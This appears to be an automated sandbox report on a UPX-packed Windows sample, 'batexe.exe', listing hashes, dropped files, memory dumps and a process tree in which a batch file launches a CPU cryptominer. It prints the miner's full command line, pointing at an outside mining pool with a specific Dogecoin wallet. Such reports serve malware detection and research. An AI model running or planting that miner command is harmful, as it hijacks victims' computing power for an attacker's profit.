73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
293s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 05:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3764	b2e.exe
4376	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4376	cpuminer-sse2.exe
4376	cpuminer-sse2.exe
4376	cpuminer-sse2.exe
4376	cpuminer-sse2.exe
4376	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5068-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 4288 wrote to memory of 4376	4288	cmd.exe	78
PID 4288 wrote to memory of 4376	4288	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Users\Admin\AppData\Local\Temp\D3CB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D3CB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D3CB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D6D8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D3CB.tmp\b2e.exe

Filesize
3.1MB

MD5
1e9d204d5d2b9895e13b91154ffe2c94

SHA1
a649a76cff6cb191d1107e0fb9b7724084bb46b6

SHA256
01df8d9c87e19c0d30d31ac1c546dc93a846b25d8b82e19111febaa4c8ac5504

SHA512
ed94ff81ce25833f0ad52fadb5fb457e2d43a3bc4c716a5efdcb8e1d6fe45a0fc2f08109025f405d9a0222b7666f84b1bb1ec1064daad691773a2d746df2bd03

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3CB.tmp\b2e.exe

Filesize
2.8MB

MD5
d4186a2739f0d06cadad345abbcf57c7

SHA1
0793156a1a5fd032dad5d5271742019b55e0eed0

SHA256
247a3903196be90a246fe5fccf94f0c7df53b0401aee3326397b05a5f035a4de

SHA512
5c7ee2164e042dbee0469bcecbea0f6fe36b1de817a16e0bc2cbd4ff6377d75e45d62deb1c198e7c27012b90f4d083ec093f7a32a138ab9b488857e50679d47e

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6D8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
807KB

MD5
ed4c24855bf149d4f3f11eccc2d31484

SHA1
21c86aa9d43cae6bb0d6ef6ea2973019ab1e452a

SHA256
ee81e8f7b521d58369ba72995eba181fd5dfbfa23733d8e9c3cdbdb0c7185a30

SHA512
9f2c8c5c32f60017c51d82d05f58c019eeba7e026bc296ab99c4cc7e2a3620e85fe58efce225db5ccddc6052f0f626fd7b8b693007a3aa271370d07c8764fd24

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
876KB

MD5
dc471efaae2cd820a3a52566fc05c111

SHA1
dcac69f9d3ca974685b870c7b63a9830d73e6eea

SHA256
8ac5eebcbac378280430f29f1facce445dc18d591f6ee5f07e8fbd30dba1932b

SHA512
bc99e0fd344ffe344908e2b6de55907a4a2432d84fcaa295c296bd65cfb91121b2c38b52f03bcab06d03a448400bb3802d0dd4f2fc943ae548c229d524865f7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
759KB

MD5
d24d74bc9c34168c4c83f1836f889d63

SHA1
03b95fa4ca762cf707166c38b2d447fec035aa27

SHA256
a75cc754ed677267b4ac3cc914dbfd690f9ae56823fbd2d4cc2bc8a69b691174

SHA512
25ac61ea90b6bf826a49f598b85047b38f493928c6cfcaaf35616e51d963db1a6029acba05704de1391059cbcdd74da4357ce9d1caae71a3f7ba5134120ab6e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
576KB

MD5
46e1c7531774dee6a7125727095ea354

SHA1
2248bc2bd821aded068d2e5e55f5e7271b50ab91

SHA256
cecc229ea9e416207638b67d03bc6846fa188a14fe1c9e75028afb48ff4e2081

SHA512
fa9dc86df3e0a8f7b2579785c03717a43eec14beab8ca3176f73d4ecb0716d047241ab30cd53518e7acd645e9f8282a20552a6fa33824c34afc5c5210cc69f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
598KB

MD5
3a5e38053d07ed95cef975e78f59e04a

SHA1
bb121d16e6fd215e2764850dc022be6ea61c2d02

SHA256
4a3f3b3da35f0a50f8917dab21581a5cdba71871550cf0a81ac3fb4c00438f24

SHA512
d5aa3c7f6ee7f9ab7cd03ba0febc81583f3fadc65530981e6b61b841da0afc2d8bb1fa96c2e8d4879ec79c2c0895da88468e96984f06465061293a733413c91a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
473KB

MD5
14f6da34f2470c7fdac0375ffcd1f308

SHA1
bf952563d7a19c9dce56f4a1f938ab286de28fec

SHA256
1a20a710c9a3313caa6920ce3af2d3deb88de2d23756bc7db8e784b708d96d7b

SHA512
4c7e50629ed2a295dbd5dfd6a42719737864a4f7a879b6e597bb89bbcf3d9c6235e2015ffbe7d7b53e81bdcdfb60656a9b3e35af17f790f8ada3f1fe51f69d07

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
679KB

MD5
a12ed81706ea1dd68a646cbb25fdf7ce

SHA1
dea422dd0c08605abff5a27f35d717889caed086

SHA256
68bb321346a784981abda71cfa8288ce5ea30d6709abe53f313899cdafb5cbf0

SHA512
69a5401d6066c4896db2294a3d3fbdd95182270a871b5d5f7d66b3666934fc55b0fccd03b4bcbd8bb07535f1d4d239d439312803630aa22409180c3710e8ae72

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
336KB

MD5
06badbe2e4f917bcf147e975436fdd29

SHA1
4ea612e9d26f17a7111bb586b9c331515acd26bb

SHA256
cc8f74953297c21fb7aeaaa82e14b2951500e59c03ac7e474cd404d8c45c7a96

SHA512
35d06020f6934b4a9ac703e7c09cf67c8a831df7c0e052c74cd7cdd0fb34354d13672241572757f245b94786cd090d3c4c74bdb8831055e4b17d85eb181da834

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
417KB

MD5
3a5e5752f7d364dcd7157c9d761ec874

SHA1
6308b53a49bcbe298424c6b773d6d0cae180a0e4

SHA256
18f1d1ef214008081fded112d3fd930a626be4d42cb651990cb02bc77fafaabf

SHA512
6b1dda610520d963fb6f15e8a81e08318015972dfe6594728113c2114aa43f1d21963fb0918b512810a5e5a5c364d0bfe32d156a8f2bf22a5e12e49baefd2ab6

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
330KB

MD5
62bd4743891e932d644f56d4fbf33dec

SHA1
dbba6908e2b89e914df39b33a48fa850e37e3968

SHA256
8a1912d6c9cfa8959f26c75116d5555a79a5f0f7a555c921c52e109a3c03901c

SHA512
52c51a4ed29a424ddcb914ca84df5442270c8f12a0ed1841b6731ef051f09ff22f9b726165cf31c55da032504ab6af0332c8e10d0bf459331ff2854fda634e63

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
431KB

MD5
7a02af663b239497c93f84128171c62f

SHA1
2e9bfc117b4d663447e03be75de0e2ccc634e08c

SHA256
6c994ccde793ea11581302ecd7c6aa8741c47e03be88aa575b87e02c67d7740e

SHA512
be12c1b07cd83d12aba2aff5ef5d81e1f99a190b2918ea61b4521c2b31067716682d3e2a083f49ea0ddb143cbe6c3a1d90fcf430c940cd5e7b56b844163a6228

Download Submit
memory/3764-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3764-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4376-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-42-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/4376-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4376-44-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/4376-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4376-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4376-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5068-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download